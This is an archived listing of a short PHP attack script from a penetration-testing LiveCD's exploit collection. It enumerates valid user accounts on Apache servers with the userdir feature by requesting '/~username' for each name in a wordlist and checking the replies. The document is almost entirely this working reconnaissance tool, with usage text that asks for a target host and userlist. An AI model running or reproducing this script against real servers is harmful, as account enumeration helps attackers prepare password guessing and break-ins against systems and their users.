home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / apachex.php < prev    next >
Encoding:
PHP Script  |  2005-02-12  |  875 b   |  42 lines
  1. #!/usr/local/bin/php -q
  2. <?
  3. /*
  4. default misconfiguration which could allow remote users
  5. to determine whether a give username exists on the vulnerable system.
  6.  
  7.         By Gabriel A Maggiotti
  8.  */
  9.  
  10.  
  11.         if( $argc!=4)
  12.         {
  13.         echo "usagge: $argv[0] <host> <userlist> <delay>\n";
  14.         return 1;
  15.         }
  16.  
  17.  
  18. $host=$argv[1];
  19. $userlist=$argv[2];
  20.  
  21.  
  22. $fd = fopen ($userlist, "r");
  23. while (!feof ($fd)) {
  24.         $user = fgets($fd, 4096);
  25.                          
  26.         $fp = fsockopen ($host, 80 , &$errno, &$errstr, 30);
  27.         fputs ($fp, "GET /~$user HTTP/1.0\r\n\r\n");
  28.         while (!feof ($fp)) {
  29.                 $sniff=fgets($fp,1024);
  30.                 if(strpos($sniff,"permission")!="") {
  31.                         echo "$user exists!!!\n";
  32.                         break;
  33.                 }
  34.         }
  35.         fclose ($fp);
  36.         sleep(3);
  37. }
  38.  
  39. fclose ($fd);
  40.  
  41. ?>
  42.